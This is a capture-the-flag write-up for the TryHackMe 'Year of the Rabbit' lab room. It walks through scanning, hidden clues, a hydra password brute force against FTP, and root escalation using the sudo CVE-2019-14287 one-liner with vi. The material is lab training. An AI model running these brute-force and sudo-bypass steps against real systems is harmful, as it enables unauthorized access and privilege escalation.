Year of The Rabbit TryHackMe Writeup
A writeup for TryHackMe Year of the Rabbit room.
The IP address for target is 10.10.51.145. You should change it to yours.
Nmap
sudo nmap -sS -sV -A 10.10.51.145
Gobuster
gobuster dir -u 10.10.51.145 -w gobusterDir.txt
Website Inspection
I visited the assets page and found this in style.css:
Well, I visited the link but i got rickrolled :)
Also I watched the rickroll video but there was a voiceover saying you are looking in the wrong place.
Then I opened Burp Suite and inspected the super secret flag link again. Apparently, someone hid this to get request.
There is a picture of a woman. Probably there is something hidden.
Downloaded file and tried a few stuff like exiftool and steghide but they didn’t work. However, strings command did the trick.
strings Hot_Babe.png
FTP
We got our username and password list. I will copy and paste these to a text file and start hydra.
hydra -l ftpuser -P pass.txt ftp://10.10.51.145 -V
Now we can connect.
There is a file named Eli’s Creds. I will transfer it to our local machine.
get Eli's_Creds.txt
Well, it contains something encryted in Brainf*ck language.
We can go to a random online decoder and get Eli’s user and password.
SSH
I will search for user flag. We can go back in directories and search.
find -name user.txt
Okay, lets look for s3cr3t.
locate s3cr3t
We have the pasford for gwendoline now. We can disconnect and reconnect as gwendoline.
Lets obtain the user flag.
cat user.txt
Root Flag
We can run vi command. I checked gtfobins but it did not work. Then i checked sudo version and apparently it is vulnerable.
I will CVE:2019–14287 first, since it is one liner.
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txtThis will open vim. Type :!/bin/bash and enter. Now we are root.
We can go to /root directory and obtain the flag.